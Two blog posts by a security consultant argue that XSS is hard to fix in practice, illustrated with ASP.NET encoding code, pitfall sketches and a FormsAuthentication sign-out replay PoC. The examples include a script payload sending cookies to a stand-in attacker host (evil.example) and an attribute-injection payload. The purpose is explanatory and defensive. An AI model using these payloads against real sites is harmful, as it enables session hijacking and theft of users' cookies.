Sunday 26 September 2010

Why do we think we can comment on the 'easiness' level of XSS?

Here is an important question: "What gives Security Consultants the right to comment on how 'easy' it is to fix an XSS vulnerability?"

After all, it is not the Security Consultant who:

1) needs to figure out:
- the root cause of the reported XSS
- where it should be fixed
- what the REAL impact to the business is
- what the side effects of applying the code changes are
2) has to make the business case to fix it (and delay the XYZ feature)
3) has to actually fix the vulnerability
4) will be fired if the fix is applied wrongly
5) will be the one that has to deal with any side effects created by the fixes
6) has to pay for it

Surely the only people qualified (and entitled) to make this 'easiness' assessment (i.e. of how 'easy' it is to fix a particular vulnerability) are the application developers and business owners!

Now think about how it must feel from the other side (i.e. the developers) when we (security consultants) tell them that it is 'easy' to fix what we have just reported to them.

And just to add insult to injury, we also like to tell them (the developers) that they need 'Training' (i.e. "...we think that you should go back to School and learn about security before you are allowed to write more code...")

It is 'easy' to say that something is 'easy' to fix...

... especially by the crowd whose responsibility ends when the problem/XSS is reported.


How many 'easy-to-fix' XSS have we fixed in the last 12 months?

On the topic of 'easy-to-fix' XSS, one question that we should be able to answer (as an industry) is: 'How many of those easy-to-fix XSS have actually been fixed and pushed into production?'

After all, if they are 'easy' to fix (and cheaper to create, test, deploy, etc...), surely the affected parties (application owners and developers) will put up very little resistance to making those fixes, right?

So where can I find these numbers? What I am after are three values:

1) the number of 'easy-to-fix' XSS discovered in real-world applications
2) the number of those 'easy-to-fix' XSS that were actually fixed and pushed into production
3) the percentage of discovered XSS that fall into the 'easy-to-fix' category

If we don't have these numbers, how do we know that we are being effective, and that those XSS are indeed 'easy to fix'?

On a Twitter thread after my previous blog post, Chris from Veracode commented that he guesses (i.e. no hard data) that about 50% of the 'easy-to-fix' XSS that they have found at Veracode are now fixed and deployed into production.

Even assuming that that 50% number is correct (it looks a bit high to me, and if I remember correctly WhiteHat's numbers are much lower), shouldn't the 'easy-to-fix' number be much higher? After all, they are 'easy to fix'...

.....

As you can tell by my use of quotes around the 'easy-to-fix' concept, I don't buy the idea that XSS are easy to fix.

Even in the cases where the 'fix' is 'just' applying encoding to a particular method (say, going from Response.Write(Request["name"]) to Response.Write(AntiXSS.HtmlEncode(Request["name"]))), there is a big difference between 'making a code change' and 'pushing it into production'.
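As a sketch, and assuming the Microsoft AntiXSS library (where the class is spelled AntiXss, in the Microsoft.Security.Application namespace), that 'one-liner' looks like this:

    // Minimal sketch of the 'just apply encoding' fix, assuming the Microsoft
    // AntiXSS library (class AntiXss in Microsoft.Security.Application)
    using System;
    using System.Web.UI;
    using Microsoft.Security.Application;

    public class HelloPage : Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            // Before: attacker-controlled input written straight into the response
            // Response.Write(Request["name"]);

            // After: HTML-encoded output. Note the hidden assumption: that this
            // value lands in an HTML *text* context; an attribute or JavaScript
            // context would need a different encoder
            Response.Write(AntiXss.HtmlEncode(Request["name"]));
        }
    }

The code change itself is the trivial part; everything that has to happen around it is not.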

Here is a quick list of what should happen when a developer knows about an 'easy-to-fix' XSS vulnerability:

1) XSS is discovered by security consultant
2) XSS is communicated to the development team
3) Development team analyses the XSS finding:
- reproduce the reported XSS
- discover what causes the XSS (root-cause analysis)
- what is the DOM context of the XSS injection point (HTML, attribute, JavaScript block, CSS)?
- was it a single instance/mistake or is it a systemic flaw?
- where can it be fixed?
- of the multiple places it can be fixed, which is the one with the least impact?
- can it be solved/mitigated without making code changes, for example using a config setting or a WAF (i.e. virtual patching)?
- is there a clear understanding of the side effects of applying the fixes?
- are there cases (or potential) for double-encoding problems (i.e. is there an understanding of all the code + data paths that lead to the location of the fix)? See the double-encoding sketch after this list.
- were other parts of the application created with the assumption that there would be no encoding on that particular field (which will break once the fix is applied)?
- who is going to pay for the fix? the developers? the client?
4) Once a strategy is created to fix the XSS, put it on the development schedule and apply the fix
5) Test the fix and make sure:
- that the XSS was correctly resolved/mitigated (who will do this? the current testers/developers who were not aware of the XSS in the first place, or the original security consultant?)
- that there is no business impact (i.e. that the application still behaves the same way and there is NO user-experience impact); ideally this should be done by the QA team
6) Deploy the fix into production

(note that this is a simplified version of what tends to happen in the real world, since there are many other factors at play: from internal/external politics, to management support for security fixes, to lack of attacks, to the fact that the original team that created the application is long gone and the developer allocated to make the 'easy-to-fix' change doesn't really know how the application he/she is about to fix actually works, etc...)
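To make the double-encoding item in step 3) concrete, here is a minimal sketch (the 'legacy encoding layer' is hypothetical; HttpUtility is from System.Web):

    // Sketch of the double-encoding pitfall: if some other code path already
    // HTML-encoded the value before it was stored, encoding it again on output
    // breaks the page for legitimate users
    using System;
    using System.Web;

    class DoubleEncodingDemo
    {
        static void Main()
        {
            string userInput = "<b>Fish & Chips</b>";

            // Layer 1 (hypothetical legacy code): value encoded before storage
            string stored = HttpUtility.HtmlEncode(userInput);
            // -> &lt;b&gt;Fish &amp; Chips&lt;/b&gt;

            // Layer 2: the new 'easy-to-fix' change encodes it again on output
            string output = HttpUtility.HtmlEncode(stored);
            // -> &amp;lt;b&amp;gt;Fish &amp;amp; Chips&amp;lt;/b&amp;gt;

            // What the user now sees rendered on the page:
            //   &lt;b&gt;Fish &amp; Chips&lt;/b&gt;
            // i.e. visible encoding artifacts: exactly the kind of business/user
            // impact that makes these fixes not so 'easy'
            Console.WriteLine(output);
        }
    }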

Some would call the above process 'easy-to-fix' ....

For me, 'easy-to-fix' code changes (if there is such a thing) are actions that:
- don't take much time,
- involve an amount of work (and side effects) that is easy to understand/visualise,
- are cheap,
- can be deployed into production quickly and without worries,
- DON'T have any potential to create business/user impact (this is the most important one),
- are, in essence, invisible to just about all parties involved.

I think the crowd that calls XSS 'easy-to-fix' is confusing 'looks easy to make the code change that I think will work' with 'making a code change that accurately resolves the reported problem without causing any impact to the application' (which is what matters to the developers/business-owners).

My fundamental problem with the 'easy-to-fix' concept is that it:
- calls the developers (and application owners) names (as in: "you guys are stupid for not fixing those problems; after all, they are 'easy-to-fix'"),
- alienates them, and
- shows them that we don't have a very good idea of how their applications and business work.

To see a more detailed explanation of this gap between security consultants' 'recommendations' and what the business/developers think of them, see John Viega's Keynote at OWASP's AppSec Ireland conference.

Saturday 25 September 2010

Can we please stop saying that XSS is boring and easy to fix!

XSS (Cross Site Scripting) is probably one of the harder problems to solve in a web application, because fixing it properly implies that one has a perfect understanding of what is 'code' and what is 'data'.

The problem with XSS (and most other web injection variations) is that the attacker/exploit is able to move from a 'data' field into a 'code' execution environment.
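A minimal example of that move from 'data' to 'code' (page and parameter names are hypothetical):

    // Sketch: the 'name' query-string value is meant to be data, but because it
    // is concatenated into the HTML output, the browser will parse it as code
    using System;
    using System.Web.UI;

    public class GreetingPage : Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            Response.Write("<div>Hello " + Request["name"] + "</div>");
            // A request such as:
            //   page.aspx?name=<script>document.location='http://evil.example/?c='+document.cookie</script>
            // turns the 'data' field into JavaScript executing in the victim's browser
        }
    }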

So saying that XSS is easy to fix and eradicate is the same thing as saying that Buffer Overflows are easy to fix and eradicate.

Also, saying that we know how to solve XSS is a red herring, because we DON'T know how to solve it. What we do know is how to mitigate it, and for the cases where we DO understand where we are mixing code and data, we can apply special protections.

But even today, in 2010, protecting against XSS is something that the developers MUST do, versus something that happens (and is enforced) by default by the frameworks/APIs used.

Take .NET, for example. Although there is quite a lot of XSS protection in the .NET framework (auto-detection of common XSS exploits, auto-encoding by default on most controls, etc...), we still see a lot of XSS in ASP.NET applications. The reason these exist is that it is very hard for developers to have a full understanding of the encoding and location of the outputs they are creating. And until we solve this 'visibility' problem, we will not solve XSS.
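Here is a hedged sketch of that 'visibility' problem (hypothetical code): the developer DID apply encoding, but the output lands in a context where that encoder is not enough:

    // Sketch: encoding was applied, but the value lands in an UNQUOTED HTML
    // attribute, where HtmlEncode alone does not help
    using System;
    using System.Web;
    using System.Web.UI;

    public class SearchPage : Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            // Looks safe: the value is HTML-encoded...
            Response.Write("<input type=text value=" +
                           HttpUtility.HtmlEncode(Request["q"]) + ">");

            // ...but a payload like:  x onmouseover=alert(document.cookie)
            // contains no characters that HtmlEncode touches, so it injects a
            // new attribute anyway. The real fix needs quoting plus
            // attribute-context encoding: exactly the kind of detail that is
            // invisible to most developers
        }
    }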

On a positive note, the SRE (Security Runtime Engine) that ships with the Anti-XSS API is an amazing tool, because it transparently adds encoding to .NET Web Controls (and it takes double-encoding problems into account, which is what makes it amazing).

The only way we will ever start dealing properly with XSS is if:
a) the framework(s) developers use have context-aware encoding on ALL outputs
b) there is no easy way to write raw HTML directly to the response stream
c) there is no easy way for developers to mix HTML code with data
d) when HTML needs to be created programmatically, it needs to be output via an HTML-DOM-aware encoding API/method (like the ones .NET AntiXSS has) - see the sketch after this list
e) there are static analysis rule packs for each of the frameworks that document (in rules) the programmatic combinations that make XSS possible (in that framework/API)
f) developers get immediate feedback (or at least feedback before checking code into production) when they create an XSS in their applications
g) web applications have a communication channel with browsers that allows browsers to better understand what is code and what is data (Mozilla CSP is a great step in this direction)
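As a sketch of d): the AntiXSS API exposes one encoder per DOM context (method names below are from the AntiXSS 3.x library; treat this as an illustration rather than a complete list):

    // Sketch of point d): pick the encoder based on WHERE the output lands
    using Microsoft.Security.Application;

    public static class ContextAwareOutput
    {
        public static void Encode(string untrusted)
        {
            string html = AntiXss.HtmlEncode(untrusted);          // HTML text context
            string attr = AntiXss.HtmlAttributeEncode(untrusted); // HTML attribute context
            string js   = AntiXss.JavaScriptEncode(untrusted);    // JavaScript context (emits a quoted JS string literal)
            string url  = AntiXss.UrlEncode(untrusted);           // URL query-string context
        }
    }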

The key to really dealing with XSS is e) and f), since these take into account the fact that developers will mix code and data, and that even in the best-designed APIs/Frameworks there will ALWAYS be combinations that create XSS. Also, without this understanding of the data/code mappings (which is where XSS lives), we will struggle to create the mappings needed for g).
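And for g), the communication channel already has an early shape: a response header that tells the browser which sources count as 'code'. A sketch using Mozilla's early CSP draft header (the header name and directive syntax are still evolving, so treat this as illustrative):

    using System;
    using System.Web.UI;

    public class CspPage : Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            // Tell a CSP-aware browser that only scripts from our own origin are
            // 'code'; injected inline script (i.e. most XSS payloads) should then
            // not execute. Header name/syntax follow Mozilla's early CSP draft
            Response.AddHeader("X-Content-Security-Policy", "allow 'self'");
        }
    }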

One of my key strategies when developing the O2 Platform was to create an environment that helps the creation and propagation of these 'Framework Rule Packs', since from my point of view, every version of every framework (and API) will need one of these Rule Packs.

Remember: security knowledge that is not available, in a consumable format (to tools or humans), AT the exact moment when it is needed (by developers, system architects, etc...), is almost as good as non-existent.

For example: "... an MSDN article that explains that the FormsAuthentication cookie is not invalidated on logout..." is not good enough.

What we need is an "...alert or note that only appears when developers use FormsAuthentication, and that explains (with PoCs) the fact that (on sign-out) the only thing that happens is that the client-side cookie is deleted from the user's browser...". The PoCs (dynamic or static) are very important in this example, since in most cases the real vulnerability will only be relevant in more feature-rich versions of the application.
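A hedged sketch of what such a PoC could look like (the captured cookie value is hypothetical, and this assumes plain FormsAuthentication with no server-side ticket store):

    // Sketch of the sign-out gap: SignOut() only tells the current browser to
    // delete its cookie; the ticket itself is not invalidated server-side
    using System;
    using System.Web.Security;

    public static class SignOutPoC
    {
        // 'capturedCookie' is a hypothetical .ASPXAUTH value recorded before logout
        public static void Replay(string capturedCookie)
        {
            // After the user has 'signed out', a replayed ticket still decrypts
            // and is still unexpired until its original timeout is reached
            FormsAuthenticationTicket ticket = FormsAuthentication.Decrypt(capturedCookie);
            Console.WriteLine(ticket.Expired
                ? "Ticket expired"
                : "Ticket STILL valid after sign-out, user: " + ticket.Name);
        }
    }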

Bottom line: Solving XSS means solving the separation of Code vs Data in web applications

And THAT ... is something that we are still quite far from.